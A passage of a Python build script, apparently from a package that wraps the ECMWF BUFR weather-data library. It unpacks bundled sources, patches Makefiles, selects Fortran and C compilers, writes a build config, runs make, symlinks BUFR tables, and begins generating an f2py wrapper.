= os.path.join(absdirname,\n 'ecmwf_bufr_lib_sources',\n 'bufrdc_000*.tar.gz')\n tgz_filelist = glob.glob(pattern)\n if len(tgz_filelist) > 0:\n tgz_file = tgz_filelist[0]\n\n cmd = 'cp '+tgz_file+' '+self.ecmwf_bufr_lib_dir\n print(\"Executing command: \", cmd)\n os.system(cmd)\n break\n\n base = os.path.split(absdirname)[0]\n absdirname = base\n\n # return to the original location\n os.chdir(cwd)\n # #]\n def use_bundled_tables_dir_copy(self):\n # #[\n \"\"\" copy the bundled version of the updated bufr tables\n in ecmwf_bufr_lib_sources.\n We must descend the directory tree first to find the root\n before doing this copy. \"\"\"\n\n # make sure the destination dir exists\n if not os.path.exists(self.ecmwf_bufr_lib_dir):\n os.makedirs(self.ecmwf_bufr_lib_dir)\n\n cwd = os.getcwd()\n absdirname = os.path.abspath(cwd)\n while absdirname != \"/\":\n files = os.listdir(absdirname)\n if \"setup.cfg\" in files:\n pattern = os.path.join(absdirname,\n 'ecmwf_bufr_lib_sources',\n 'bufrdc_tables*.tar.gz')\n tgz_filelist = glob.glob(pattern)\n if len(tgz_filelist) > 0:\n tgz_file = tgz_filelist[-1] # take the newest file\n\n cmd = 'cp '+tgz_file+' '+self.ecmwf_bufr_lib_dir\n print(\"Executing command: \", cmd)\n os.system(cmd)\n break\n else:\n errtxt = ('Sorry, could not find replacement bufr tables '+\n 'tar file. Something seems wrong with '+\n 'this installation.')\n raise LibraryBuildError(errtxt)\n\n base = os.path.split(absdirname)[0]\n absdirname = base\n\n # return to the original location\n os.chdir(cwd)\n # #]\n def get_source_dir(self):\n # #[\n \"\"\" a method to find the name of the current BUFR library\n sources (after unpacking the tarball), and also the name\n of the current tarball.\"\"\"\n\n # save the location to be used for installing the ECMWF BUFR library\n ecmwf_bufr_lib_dir = \"./ecmwf_bufr_lib\"\n list_of_bufr_tarfiles = glob.glob(os.path.join(ecmwf_bufr_lib_dir,\n \"bufrdc_000*.tar.gz\"))\n\n # safety catch\n if len(list_of_bufr_tarfiles) == 0:\n return (None, None)\n\n # sort in reverse alphabetical order to get the newest one on top\n list_of_bufr_tarfiles.sort(reverse=True)\n if self.verbose:\n print(\"available library tarfiles: \", list_of_bufr_tarfiles)\n print(\"most recent library tarfile: \", list_of_bufr_tarfiles[0])\n\n tarfile_to_install = os.path.split(list_of_bufr_tarfiles[0])[1]\n\n # find out the actual name of the library source directory\n # after unpacking. Use the tarfile module and look inside:\n tarfile_obj = tarfile.open(list_of_bufr_tarfiles[0], 'r:gz')\n names = tarfile_obj.getnames()\n #print(\"names[0:5] = \", names[0:5])\n # this library holds everything in a single subdirectory named something\n # like bufr_000380, so I guess it is safe to assume that the first name\n # in the archive will be the name of this directory.\n bufr_dir = names[0]\n tarfile_obj.close()\n\n source_dir = os.path.join(ecmwf_bufr_lib_dir, bufr_dir)\n\n return (source_dir, tarfile_to_install)\n # #]\n def get_tables_source_dir(self):\n # #[\n \"\"\" a method to find the name of the current BUFR tables\n sources (after unpacking the tarball), and also the name\n of the current tarball.\"\"\"\n\n # save the location to be used for installing the ECMWF BUFR library\n ecmwf_bufr_lib_dir = \"./ecmwf_bufr_lib\"\n list_of_bufr_tables_tarfiles = \\\n glob.glob(os.path.join(ecmwf_bufr_lib_dir,\n \"bufrdc_tables*.tar.gz\"))\n\n # safety catch\n if len(list_of_bufr_tables_tarfiles) == 0:\n return (None, None)\n\n # sort in reverse alphabetical order to get the newest one on top\n list_of_bufr_tables_tarfiles.sort(reverse=True)\n if self.verbose:\n print(\"available bufr tables tarfiles: \",\n list_of_bufr_tables_tarfiles)\n print(\"most recent bufr_tables tarfile: \",\n list_of_bufr_tables_tarfiles[0])\n\n tarfile_to_install = os.path.split(list_of_bufr_tables_tarfiles[0])[1]\n\n # find out the actual name of the bufr tables source directory\n # after unpacking. Use the tarfile module and look inside:\n tarfile_obj = tarfile.open(list_of_bufr_tables_tarfiles[0], 'r:gz')\n names = tarfile_obj.getnames()\n # print(\"names[0:5] = \", names[0:5])\n\n # get the dir name from the second element in the list\n bufr_tables_dir = os.path.split(names[1])[0]\n tarfile_obj.close()\n\n bufr_tables_dir = os.path.join(ecmwf_bufr_lib_dir, bufr_tables_dir)\n\n # print('bufr_tables_dir = ', bufr_tables_dir)\n # print('tarfile_to_install = ', tarfile_to_install)\n # sys.exit(1)\n \n return (bufr_tables_dir, tarfile_to_install)\n # #]\n def install(self, remake=False):\n # #[\n \"\"\" a method to compile the ECMWF BUFR library \"\"\"\n\n if not remake:\n # #[ find and unpack the ECMWF BUFR library tar file\n\n # first see if there is already a tarfile available\n # (the user may have provided one)\n (source_dir, tarfile_to_install) = self.get_source_dir()\n\n if source_dir is None:\n # copy the bundled version\n # of the library sources stored in ecmwf_bufr_lib_sources\n print('Using bundled library copy...')\n self.use_bundled_library_copy()\n \n # retry (now we should have a copy of the tarfile)\n (source_dir, tarfile_to_install) = self.get_source_dir()\n else:\n # debug print\n # print('(source_dir, tarfile_to_install) = ',\n # (source_dir, tarfile_to_install))\n pass\n\n # safety catch\n if source_dir is None:\n print(\"ERROR: extracting source_dir failed\")\n raise LibraryBuildError\n\n if not os.path.exists(source_dir):\n # safety catch\n if tarfile_to_install == None:\n print(\"ERROR: no tarfile available for BUFR library.\")\n raise LibraryBuildError\n\n if self.verbose:\n cmd = \"cd \"+self.ecmwf_bufr_lib_dir+\\\n \";tar zxvf \"+tarfile_to_install\n else:\n cmd = \"cd \"+self.ecmwf_bufr_lib_dir+\\\n \";tar zxf \"+tarfile_to_install\n \n print(\"Executing command: \", cmd)\n os.system(cmd)\n else:\n print(\"path exists: \", source_dir)\n print(\"assuming the package is already unpacked...\")\n\n # extract numerical BUFR library version\n # this should be something like: bufrdc_000389\n try:\n bufr_dir = os.path.split(source_dir)[1]\n parts = bufr_dir.split('_')\n if len(parts) > 1:\n bufrdir_version = int(parts[1])\n else:\n # exception seems needed for version 000401\n # which unpacks as 000401 without bufrdc_ prepended\n bufrdir_version = int(parts[0])\n # print('bufr_dir = ',bufr_dir)\n # print('bufrdir_version = ',bufrdir_version)\n except:\n print('ERROR: could not extract numerical BUFR library')\n print('version number ...')\n print('Please report this bug.')\n raise ProgrammingError\n # #]\n # #[ add a few small fortran routines\n add_fortran_dir_list = \\\n descend_dirpath_and_find(os.getcwd(),\n 'additional_fortran_code')[1]\n\n add_fortran_dir = add_fortran_dir_list[0]\n\n additional_fortran_files = ['handle_stdout.F',\n 'retrieve_settings.F',\n #'add_debug_code.F',\n 'reset_global_variables.F',\n 'set_nokey.F']\n for fortr_file in additional_fortran_files:\n shutil.copy(os.path.join(add_fortran_dir, fortr_file),\n os.path.join(source_dir, 'bufrdc', fortr_file))\n print('copied file: '+fortr_file)\n\n # add these new source files to the sources list to include it in\n # the compilation and library creation procedure\n\n sources_file = os.path.join(source_dir, 'bufrdc', 'sources')\n fds = open(sources_file, 'r')\n sources_lines = fds.readlines()\n fds.close()\n\n # save the original with a modified name\n os.system('mv '+sources_file+' '+sources_file+'.orig')\n\n fds = open(sources_file, 'w')\n fds.write(''.join(line for line in sources_lines[:5]))\n for fortr_file in additional_fortran_files:\n fds.write(' '+fortr_file+' \\\\\\n')\n print('added file '+fortr_file+' to the sources list')\n fds.write(''.join(line for line in sources_lines[5:]))\n fds.close()\n # #]\n # #[ force value of jelem if desired\n if self.set_jelem is not None:\n param_file = os.path.join(source_dir, 'bufrdc',\n 'parameter.F')\n print('paramfile: ', param_file)\n os.rename(param_file, param_file+'.orig')\n fds_in = open(param_file+'.orig', 'rb')\n fds_out = open(param_file, 'wb')\n for line in fds_in.readlines():\n print(line)\n if b'JELEM=' in line:\n part1 = line.split(b'JELEM=')[0]+b'JELEM='\n part2 = b',JSUBS='+line.split(b',JSUBS=')[1]\n replaced_line = part1+str(self.set_jelem)+part2\n print('Replacing line: [{}]'.format(line.strip()))\n print(' by line: [{}]'.\n format(replaced_line.strip()))\n fds_out.write(replaced_line)\n else:\n fds_out.write(line)\n fds_in.close()\n fds_out.close()\n os.chmod(param_file, 0o755)\n # #]\n # #[ install bufr tables update package\n print('source_dir = ', source_dir)\n tables_dir = os.path.join(source_dir, 'bufrtables')\n\n #print('deleting original tables dir')\n #shutil.rmtree(tables_dir)\n print('renaming original tables dir')\n shutil.move(tables_dir, tables_dir+'.orig')\n\n # get a copy of the bundled replacement tables dir\n # and place it in the ecmwf_bufr_lib dir\n self.use_bundled_tables_dir_copy()\n\n (replacement_bufr_tables_dir, tables_tarfile_to_install) = \\\n self.get_tables_source_dir()\n print('replacement_bufr_tables_dir = ',\n replacement_bufr_tables_dir)\n print('tables_tarfile_to_install = ',\n tables_tarfile_to_install)\n\n print('unpack replacement bufr tables dir')\n ecmwf_bufr_lib_dir = \"./ecmwf_bufr_lib\"\n cmd = ('cd '+ecmwf_bufr_lib_dir+\n ';tar xvfz '+tables_tarfile_to_install)\n print('Executing: ', cmd)\n os.system(cmd)\n\n # ensure permissions are sane\n # (version 000412 has no write permission, which\n # breaks the clean command...)\n cmd = 'chmod -R u+w '+replacement_bufr_tables_dir\n print('Executing: ', cmd)\n os.system(cmd)\n \n # rename the bufr tables dir to put it in the right location\n cmd = 'mv '+replacement_bufr_tables_dir+' '+tables_dir\n print('Executing: ', cmd)\n os.system(cmd)\n # #]\n\n # #[ apply a smal patch to the 000409 test.sh script\n # this patch ensures the correct bufrtables directory is used\n # during execution of this test script\n # Reported to ECMWF in jira issue SUP-1727\n if tarfile_to_install == 'bufrdc_000409.tar.gz':\n scr_file = os.path.join(source_dir, 'test.sh')\n os.rename(scr_file, scr_file+'.orig')\n fds_in = open(scr_file+'.orig', 'rb')\n fds_out = open(scr_file, 'wb')\n for line in fds_in.readlines():\n if not ( (b'set -ex' in line) or\n (b'BUFR_TABLES=/var/tmp' in line) ):\n fds_out.write(line)\n fds_in.close()\n fds_out.close()\n os.chmod(scr_file, 0o755)\n # #]\n # #[ apply a smal patch to the Makefile\n # this patch disables execution of the tables_tools/check_tables.sh\n # test script during the make stage, because it fails for\n # this bufr tables update package due to minor table formatting\n # problems (which are probably not noticed at all by the fortran\n # and python code, but the regexp in the perl check script\n # stumbles on this problem).\n # Reported to ECMWF in jira issue SUP-2096\n if tables_tarfile_to_install in \\\n ['bufrdc_tables-4.1.1-Source.tar.gz',\n 'bufrdc_tables-4.1.2.tar.gz']:\n for fn in ['Makefile', 'Makefile.in']:\n mk_file = os.path.join(source_dir, fn)\n if os.path.exists(mk_file):\n print('Modifying: ', mk_file)\n os.rename(mk_file, mk_file+'.orig')\n fds_in = open(mk_file+'.orig', 'rb')\n fds_out = open(mk_file, 'wb')\n for line in fds_in.readlines():\n if not b'check_tables.sh' in line:\n fds_out.write(line)\n fds_in.close()\n fds_out.close()\n os.chmod(mk_file, 0o755)\n # #]\n \n # #[ find a suitable fortran compiler to use\n\n #if (self.verbose):\n print('selection fortran compiler')\n print('==>input: self.fortran_compiler = ', self.fortran_compiler)\n print('==>input: self.preferred_fortran_compiler = ',\n self.preferred_fortran_compiler)\n\n # first check a possible custom executable, passed in\n # through the setup.cfg file or on the commandline\n is_present = self.check_presence(self.fortran_compiler)\n if is_present:\n self.fortran_compiler_to_use = 'custom'\n\n # the first one found will be used, unless a preferred one is specified.\n for f_compiler in POSSIBLE_F_COMPILERS:\n if self.preferred_fortran_compiler == f_compiler:\n if self.check_presence(f_compiler):\n self.fortran_compiler_to_use = f_compiler\n break # stop the for loop\n\n if self.fortran_compiler_to_use is None:\n # a sanity check\n if self.preferred_fortran_compiler is not None:\n if not (self.preferred_fortran_compiler in\n POSSIBLE_F_COMPILERS):\n print(\"ERROR: unknown preferred fortran compiler \"+\n \"specified:\",\n self.preferred_fortran_compiler)\n print(\"valid options are: \",\n \", \".join(s for s in POSSIBLE_F_COMPILERS))\n raise NotImplementedError\n\n print(\"preferred fortran compiler [\"+\n str(self.preferred_fortran_compiler)+\n \"] seems not available...\")\n print(\"falling back to default fortran compiler\")\n\n for f_compiler in POSSIBLE_F_COMPILERS:\n is_present = self.check_presence(f_compiler)\n if is_present:\n self.fortran_compiler_to_use = f_compiler\n break # stop the for loop\n\n if self.fortran_compiler_to_use is None:\n print(\"ERROR: no valid fortran compiler found,\")\n print(\"installation is not possible\")\n print(\"Please install a fortran compiler first.\")\n print(\"Good options are the free GNU compilers\")\n print(\"gfortran and g95 which may be downloaded free of charge.\")\n print(\"(see: http://gcc.gnu.org/fortran/ \")\n print(\" and: http://www.g95.org/ )\")\n raise EnvironmentError\n\n #if (self.verbose):\n print('selection fortran compiler')\n print('==>result: self.fortran_compiler_to_use = ',\n self.fortran_compiler_to_use)\n\n # #]\n\n # #[ find a suitable c compiler to use\n\n #if (self.verbose):\n print('selection c compiler')\n print('==>input: self.c_compiler = ', self.c_compiler)\n print('==>input: self.preferred_c_compiler = ',\n self.preferred_c_compiler)\n\n # first check a possible custom executable, passed in\n # through the setup.cfg file or on the commandline\n is_present = self.check_presence(self.c_compiler)\n if is_present:\n self.c_compiler_to_use = 'custom'\n\n # the first one found will be used, unless a preferred one is specified.\n for c_compiler in POSSIBLE_C_COMPILERS:\n if self.preferred_c_compiler == c_compiler:\n if self.check_presence(c_compiler):\n self.c_compiler_to_use = c_compiler\n break # stop the for loop\n\n if self.c_compiler_to_use is None:\n # a sanity check\n if self.preferred_c_compiler is not None:\n if self.preferred_c_compiler not in POSSIBLE_C_COMPILERS:\n print(\"ERROR: unknown preferred c compiler \"+\n \"specified:\",\n self.preferred_c_compiler)\n print(\"valid options are: \",\n \", \".join(s for s in POSSIBLE_C_COMPILERS))\n raise NotImplementedError\n\n if self.preferred_c_compiler is None:\n print(\"no preferred c compiler given\")\n else:\n print(\"preferred c compiler [\"+\n str(self.preferred_c_compiler)+\n \"] seems not available...\")\n print(\"falling back to default c compiler\")\n\n for c_compiler in POSSIBLE_C_COMPILERS:\n is_present = self.check_presence(c_compiler)\n if is_present:\n self.c_compiler_to_use = c_compiler\n break # stop the for loop\n\n if self.c_compiler_to_use is None:\n print(\"ERROR: no valid c compiler found,\")\n print(\"installation is not possible\")\n print(\"Please install a c compiler first.\")\n print(\"A good option is the free GNU compiler gcc\")\n print(\"which may be downloaded free of charge.\")\n print(\"(see: http://gcc.gnu.org/ )\")\n raise EnvironmentError\n\n #if (self.verbose):\n print('selection c compiler')\n print('==>result: self.c_compiler_to_use = ', self.c_compiler_to_use)\n\n # #]\n\n # #[ add the custom LD_LIBRARY_PATH settings\n libpath = \"\"\n if self.fortran_ld_library_path != None:\n libpath = \";\".join(s for s in\n [libpath, self.fortran_ld_library_path]\n if s != \"\")\n if self.c_ld_library_path != None:\n libpath = \";\".join(s for s in\n [libpath, self.c_ld_library_path]\n if s != \"\")\n\n if libpath != \"\":\n print(\"Using LD_LIBRARY_PATH setting: \", libpath)\n # #]\n\n if not remake:\n # #[ generate a config file for compilation of the BUFR library\n\n #------------------------------------------------------------------#\n # Possible commands to the make command for the BUFR library, #\n # in case you wish to use the config files from the ECMWF software #\n # package are: (see the README file within source_dir) #\n # - architecture: ARCH=sgimips (or: decalpha,hppa,linux,rs6000, #\n # sun4) #\n # - 64 bit machine: R64=R64 #\n # - compiler name (only for linux or sun machines): CNAME=_gnu #\n # #\n #------------------------------------------------------------------#\n\n # NOTE that for the linux case the library has some hardcoded\n # switches to use 32-bit variables in its interfacing (at least\n # last time I looked), so DO NOT try to use the 64 bit option on\n # linux, even if you have a 64-bit processor and compiler\n # available !\n # Even if the code runs, it will fail miserably and cause\n # segmentation faults if you are lucky, or just plain nonsense\n # if you are out of luck ....\n # (see the files bufrdc_000400/bufrdc/fortint.h and\n # bufrdc_000400/pbio/fortint.h which hardcode JBPW_DEF to be 32\n # (JBPW defines number of bits per word to be used)\n\n # The following 4 settings determine the name of the config file\n # used by the Make command; look in the file\n # ecmwf_bufr_lib/bufr_000380/config/ to see all available versions.\n\n # ARCH=\"linux\"\n # CNAME=\"_compiler\"\n # R64=\"\"\n # A64=\"\"\n\n # note: usefull free compilers for linux that you can use are:\n # (at least for these config files are provided in the ECMWF BUFR\n # package)\n # g77 : CNAME=\"_gnu\"\n # g95 : CNAME=\"_g95\"\n # gfortran : CNAME=\"_gfortran\"\n\n # Notes on compiler switches:\n\n # for most compilers you should force the BUFR library to use 4 byte\n # integers as default integer. Do this by adding the \"-i4\" option.\n # This works for most compilers, with gfortran as known exception\n # (that one has this setting as default and does not have a\n # commandline option to set it)\n\n # it seems the c compiler step needs the \"-DFOPEN64\" switch to be\n # set (at least it is present in most config files in the package)\n # but it is never used in the source code itself, so I guess it is\n # obsolete.\n\n fcmp = ''\n fflags = ''\n\n if self.fortran_compiler_to_use == 'custom':\n fcmp = self.fortran_compiler\n fflags = ' '.join(flags for flags in FFLAGS_COMMON)\n else:\n fcmp = self.fortran_compiler_to_use\n fflags_to_use = FFLAGS_NEEDED[fcmp]\n\n # exception for gfortran v10+\n if fcmp == 'gfortran':\n version_file = 'gfortran_version.txt'\n cmd = '{} --version > {}'.format(fcmp, version_file)\n os.system(cmd)\n with open(version_file, 'rt') as fd_ver:\n line = fd_ver.readline()\n parts = line.split()\n version = parts[3]\n version_major = int(version.split('.')[0])\n\n if version_major >= 10:\n fflags_to_use = FFLAGS_NEEDED['gfortran_10']\n\n fflags = ' '.join(flags for flags in fflags_to_use)\n\n # add any custom flags given by the user\n if self.fortran_flags != None:\n fflags = fflags + ' ' + self.fortran_flags\n\n if self.c_compiler_to_use == 'custom':\n ccmp = self.c_compiler\n cflags = ' '.join(flags for flags in CFLAGS_COMMON)\n else:\n ccmp = self.c_compiler_to_use\n cflags = ' '.join(flags for flags in CFLAGS_NEEDED[ccmp])\n\n # add any custom flags given by the user\n if self.c_flags != None:\n cflags = cflags+' '+self.c_flags\n\n # no check implemented on the \"ar\" and \"ranlib\" commands yet\n # (easy to add if we woould need it)\n\n # a command to generate an archive (*.a) file\n arcmd = \"ar\"\n # a command to generate an index of an archive file\n rlcmd = \"/usr/bin/ranlib\"\n\n # Unfortunately, the config files supplied with this library seem\n # somewhat outdated and sometimes incorrect, or incompatible with\n # the current compiler version (since they seem based on some\n # older compiler version, used some time ago at ECMWF, and never\n # got updated). This especially is true for the g95 compiler.\n # Therefore we have decided (at KNMI) to create our own\n # custom config file in stead.\n # We just call it: config.linux_compiler\n # which seems safe for now, since ECMWF doesn't use that name.\n\n arch = \"linux\"\n cname = \"_compiler\"\n r64 = \"\"\n a64 = \"\"\n\n # construct the name of the config file to be used\n config_file = \"config.\"+arch+cname+r64+a64\n fullname_config_file = os.path.join(source_dir, \"config\",\n config_file)\n\n # this check is only usefull if you use one of the existing\n # config files\n #if not os.path.exists(fullname_config_file):\n # # see if a version with \".in\" extension is present\n # # and if so, symlink to it.\n # if not os.path.exists(fullname_config_file+\".in\"):\n # print(\"ERROR: config file not found: \",\n # fullname_config_file)\n # raise IOError\n # else:\n # os.symlink(config_file+\".in\", fullname_config_file)\n\n # create our custom config file:\n print(\"Using: \"+fcmp+\" as fortran compiler\")\n print(\"Using: \"+ccmp+\" as c compiler\")\n\n print(\"Creating ECMWF-BUFR config file: \", fullname_config_file)\n cfd = open(fullname_config_file, 'w')\n cfd.write(\"# Generic configuration file for linux.\\n\")\n cfd.write(\"AR = \"+arcmd+\"\\n\")\n cfd.write(\"ARFLAGS = rv\\n\")\n cfd.write(\"CC = \"+ccmp+\"\\n\")\n cfd.write(\"CFLAGS = \"+cflags+\"\\n\")\n cfd.write(\"FASTCFLAGS = \"+cflags+\"\\n\")\n cfd.write(\"FC = \"+fcmp+\"\\n\")\n cfd.write(\"FFLAGS = \"+fflags+\"\\n\")\n cfd.write(\"VECTFFLAGS = \"+fflags+\"\\n\")\n cfd.write(\"RANLIB = \"+rlcmd+\"\\n\")\n cfd.close()\n\n # create a backup copy in the ecmwf_bufr_lib_dir\n source = fullname_config_file\n destination = os.path.join(self.ecmwf_bufr_lib_dir, \"config_file\")\n shutil.copyfile(source, destination)\n # #]\n\n if (not remake) and (bufrdir_version > 387):\n # #[ generate fortran2c config file for newer bufr versions\n # fortran2c_compiler contains the extra libraries needed\n # to link the objects created with the current fortran\n # compiler with a main program created with the\n # current c-compiler\n fortran2c_name = 'fortran2c_compiler'\n fortran2c_target = os.path.join(source_dir, \"config\",\n fortran2c_name)\n fortran2c_source = None\n if self.fortran_compiler_to_use == 'g95':\n fortran2c_source = os.path.join(source_dir, \"config\",\n 'fortran2c_g95')\n shutil.copyfile(fortran2c_source, fortran2c_target)\n\n if self.fortran_compiler_to_use == 'gfortran':\n fortran2c_source = os.path.join(source_dir, \"config\",\n 'fortran2c_gfortran')\n # just copying the provided file fails for me\n # (gfortran 4.7.x also needs -lm during the link stage)\n #shutil.copyfile(fortran2c_source, fortran2c_target)\n fd_f2c = open(fortran2c_target, 'w')\n fd_f2c.write('FORTRAN2C = -lgfortran -lm')\n fd_f2c.close()\n\n if self.fortran_compiler_to_use == 'pgf90':\n fortran2c_source = os.path.join(source_dir, \"config\",\n 'fortran2c')\n shutil.copyfile(fortran2c_source, fortran2c_target)\n\n if fortran2c_source is None:\n fortran2c_source = os.path.join(source_dir, \"config\",\n 'fortran2c_gnu')\n shutil.copyfile(fortran2c_source, fortran2c_target)\n\n # #]\n # #[ generate the makefile for newer bufr versions\n # bufr library versions 000388 and newer have changed the\n # build and install procedure. They have a new 'build_library'\n # script that tries to guess system parameters and then\n # creates the Makefile from Makefile.in by applying a series\n # of 'sed' commands. However, this script is interactive and\n # asks the use several questions. Therefore this python\n # script bypasses this build_library script and tries to do\n # the same for linux without user intervention\n\n # makefiles are created from Makefile.in\n # in these directories:\n makefile_dirs = ['.', 'bufrdc', 'bufrtables', 'pbio', 'fortranC',\n 'examples', 'synop2bufr',\n 'synop2bufr/station_list']\n install_dir = 'dummy' # seems never used in the makefiles\n replacements = [('%reals%', r64),\n ('%install_dir%', install_dir),\n ('%arch%', arch),\n ('%comp%', cname),\n ('%plat%', a64),\n ('%depl%', 'bufr')]\n for makefile_dir in makefile_dirs:\n makefile = os.path.join(source_dir, makefile_dir, 'Makefile')\n makefile_template = makefile+'.in'\n if os.path.exists(makefile_template):\n print('creating: ', makefile)\n fd_makefile = open(makefile, 'w')\n for line in open(makefile_template).readlines():\n line_new = line\n # print('adapting line: ',line)\n for (old, new) in replacements:\n line_new = line_new.replace(old, new)\n fd_makefile.write(line_new)\n fd_makefile.close()\n # #]\n\n # #[ compile little pieces of Fortran and c to test the compilers\n fortran_compile_test(fcmp, fflags, libpath)\n c_compile_test(ccmp, cflags, libpath)\n # #]\n\n # #[ retrieve integer sizes for c and fortran\n self.integer_sizes = retrieve_integer_sizes(ccmp, cflags, libpath,\n fcmp, fflags, libpath)\n # #]\n\n # #[ now use the make command to build the library\n\n # construct the compilation command:\n cmd = \"cd \"+source_dir+\";make ARCH=\"+arch+\" CNAME=\"+\\\n cname+\" R64=\"+r64+\" A64=\"+a64\n #if not self.verbose:\n cmd += \" 2>1 > bufrdc_build.log\"\n\n # now issue the Make command\n if libpath == \"\":\n print(\"Executing command: \", cmd)\n os.system(cmd)\n else:\n #(lines_stdout, lines_stderr) = \\\n # run_shell_command(cmd, libpath = libpath)\n run_shell_command(cmd, libpath=libpath, catch_output=False)\n # #]\n # #[ scan the build log for possible problems\n logfile = os.path.join(source_dir, 'bufrdc_build.log')\n text = b''\n if os.path.exists(logfile):\n fds = open(logfile,'rb')\n text = fds.read()\n fds.close() \n problem_detected = False\n if b'failed' in text:\n problem_detected = True\n if b'FAILED' in text:\n problem_detected = True\n\n if problem_detected:\n print('\\n\\n')\n print('A problem was detected in the logfile: {0}'.\n format(os.path.join(os.getcwd(), logfile)))\n print(\"Please investigate it or send it to the developer of\")\n print(\"this module for analysis.\")\n print(\"Build failed, aborting\")\n sys.exit(1)\n\n # #]\n # #[ check the result and move the library file\n fullname_bufr_lib_file = os.path.join(source_dir, self.bufr_lib_file)\n if os.path.exists(fullname_bufr_lib_file):\n print(\"Build seems successfull\")\n # remove any old library file that might be present\n if os.path.exists(self.bufr_lib_file):\n os.remove(self.bufr_lib_file)\n\n # move to a more convenient location\n shutil.move(fullname_bufr_lib_file, self.bufr_lib_file)\n ensure_permissions(self.bufr_lib_file, 'r')\n else:\n print(\"ERROR in bufr_interface_ecmwf.install:\")\n print(\"No libbufr.a file seems generated.\")\n raise LibraryBuildError\n # #]\n\n if not remake:\n # #[ copy the bufr tables\n # copy the directory holding the provided\n # BUFR tables, to a more convenient location\n # (don't move it since this will mess-up the build system\n # for library versions 000388 and above when trying\n # to do a rebuild.)\n fullname_table_dir = os.path.join(source_dir, \"bufrtables\")\n table_dir = \"ecmwf_bufrtables\"\n #shutil.copytree(fullname_table_dir, table_dir)\n os.mkdir(table_dir)\n symlink_to_all_files(fullname_table_dir, table_dir)\n\n # remove some excess files from the bufr tables directory\n # that we don't need any more (symlinks, tools)\n #tdfiles = os.listdir(table_dir)\n #for tdfile in tdfiles:\n # fullname = os.path.join(table_dir, tdfile)\n # if os.path.islink(fullname):\n # os.unlink(fullname)\n # else:\n # ext = os.path.splitext(tdfile)[1]\n # if not ext.upper() == \".TXT\":\n # os.remove(fullname)\n # else:\n # ensure_permissions(fullname, 'r')\n\n # select the newest set of tables and symlink them\n # to a default name (making sure a matching C table\n # is provided as well)\n pattern = os.path.join(table_dir, 'C0*098*.TXT')\n c_tables = glob.glob(pattern)\n # print('pattern = ',pattern)\n # print('c_tables = ',c_tables)\n\n if len(c_tables) > 0:\n c_tables.sort()\n # assume the highest numbered table is the most recent one\n ct_file = os.path.split(c_tables[-1])[1]\n ct_base, ct_ext = os.path.splitext(ct_file)\n newest_table_code = ct_base[1:]\n newest_c_table = ct_file\n newest_b_table = 'B'+newest_table_code+ct_ext\n newest_d_table = 'D'+newest_table_code+ct_ext\n\n default_b_table = 'B_default.TXT'\n default_c_table = 'C_default.TXT'\n default_d_table = 'D_default.TXT'\n\n current_path = os.getcwd()\n os.chdir(table_dir)\n os.symlink(newest_b_table, default_b_table)\n os.symlink(newest_c_table, default_c_table)\n os.symlink(newest_d_table, default_d_table)\n os.chdir(current_path)\n else:\n print('WARNING: no default table B, C and D found')\n # #]\n\n # #[ some old notes\n\n # save the settings for later use\n #self.make_settings = (arch, cname, r64, a64)\n #self.compilers = (fcmp, fflags, ccmp, cflags)\n #self.tools = (ar, rl)\n\n # actually, this saving of settings is not the way I would\n # prefer doing this. I think it is better to keep the 2 stages\n # (installation of the BUFR library, and generation of the\n # python interface shared object) as separate as possible.\n # This allows rerunning generation of the python interface\n # without rerunning the installation of the BUFR library\n # (which will at least save a lot of time during development)\n #\n # So the generate_python_wrapper routine should just\n # read the config file generated above, and not use these\n # settings in self, that might not always be defined.\n # #]\n\n # #]\n def check_presence(self, command):\n # #[\n \"\"\" a method to check for the presence of executable commands\n from a user shell (using the which command) \"\"\"\n\n if self.verbose:\n print(\"checking for presence of command: \"+str(command))\n\n if command == None:\n return False\n\n # get the real command, in case it was an alias\n cmd = \"which \"+command\n lines_stdout = run_shell_command(cmd, catch_output=True)[0]\n\n if len(lines_stdout) == 0:\n # command is not present in default path\n return False\n else:\n # command is present in default path\n return True\n # #]\n def generate_python_wrapper(self, source_dir, remake=False):\n # #[\n \"\"\" a method to call f2py to create a wrapper between the fortran\n library code and python. \"\"\"\n\n # #[ some settings\n signatures_filename = \"signatures.pyf\"\n f2py_tool_name = 'python3 ./run_f2py_tool.py'\n\n #f2py_tool_name = 'f2py'\n #os.system('chmod u+x '+f2py_tool_name)\n\n # open the config file used for building the ECMWF BUFR library\n config_file = os.path.join(self.ecmwf_bufr_lib_dir, \"config_file\")\n lines = open(config_file).readlines()\n\n # extract which fortran compiler is used\n fortran_compiler = 'undefined'\n fortran_compiler_flags = 'undefined'\n for line in lines:\n parts = line.split('=')\n if parts[0].strip() == \"FC\":\n fortran_compiler = parts[1].strip()\n if parts[0].strip() == \"FFLAGS\":\n fortran_compiler_flags = parts[1].strip()\n\n # apply ld_library path settings\n libpath = \"\"\n if self.fortran_ld_library_path != None:\n libpath = \";\".join(s for s in\n [libpath, self.fortran_ld_library_path]\n if s != \"\")\n if self.c_ld_library_path != None:\n libpath = \";\".join(s for s in\n [libpath, self.c_ld_library_path]\n if s != \"\")\n # #]\n\n if not remake:\n # #[ create signature file\n # just take them all (this works for me)\n source_file_list = source_dir+\"/bufrdc/*.F \"+\\\n source_dir+\"/pbio/pbbufr.F\"\n\n # call f2py and create a signature file that defines the\n # interfacing to the fortran routines in this library\n cmd = (f2py_tool_name+\n \" --overwrite-signature \"+\n \" --build-dir \"+self.wrapper_build_dir+\n \" -m \"+self.wrapper_module_name+\n \" -h \"+signatures_filename+\n \" \"+source_file_list)\n\n #if not self.verbose:\n cmd += \" 2>1 > f2py_build.log\"\n\n if libpath == \"\":\n print(\"Executing command: \", cmd)\n os.system(cmd)\n # (lines_stdout, lines_stderr) = \\\n # run_shell_command(cmd, catch_output = True)\n else:\n print(\"Using LD_LIBRARY_PATH setting: \", libpath)\n # (lines_stdout, lines_stderr) = \\\n # run_shell_command(cmd, libpath = libpath,\n # catch_output = True)\n run_shell_command(cmd, libpath=libpath, catch_output=False)\n\n # safety check: see if the signatures.pyf file really is created\n signatures_fullfilename = os.path.join(self.wrapper_build_dir,\n signatures_filename)\n if not os.path.exists(signatures_fullfilename):\n print(\"ERROR: build of python wrapper failed\")\n print(\"the signatures file could not be found\")\n raise InterfaceBuildError\n\n if self.verbose:\n # display signatures file since it seems not\n # possible to extract it from the github workflow\n fd_sig = open(signatures_fullfilename, 'rb')\n text = fd_sig.read()\n print('Starting dump of ', signatures_fullfilename)\n print(text)\n print('End of dump of ', signatures_fullfilename)\n fd_sig.close()\n\n # adapt the signature file\n # this is needed, since the wrapper generation fails to do a number\n # of file includes that are essential 